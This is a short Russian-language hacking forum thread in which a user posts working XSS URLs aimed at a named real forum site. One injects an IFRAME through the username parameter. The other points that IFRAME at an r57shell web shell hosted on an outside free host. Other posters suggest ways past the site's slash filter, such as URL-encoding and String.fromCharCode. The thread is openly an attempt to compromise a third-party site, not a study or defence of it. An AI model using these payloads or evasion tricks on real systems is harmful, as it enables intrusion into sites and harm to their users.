Первый раз такое, аж обидно!))но здаватся не собираюсь!

_http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе
http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME>
, но вылезает эррор, типа :
Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
Кто то может подскажет чтонить?

/ > %2f

прописую путь к 57шеллу на народе


На народе нельзя, он php не поддерживает.

На народе нельзя, он php не поддерживает.
У него полюбому бы тогда код бы шелла высветелся, а народ, да пхп для него было бы шикарно! :)

2 jah
Я уж и кодировал строку
нет, %2f не катит!Я ж грю.!
ну да, код бы должен был показацца!

$n@ke, попробуй через String.fromCharCode - может получится... Понять о чем это можно здесь https://forum.antichat.ru/thread15709.html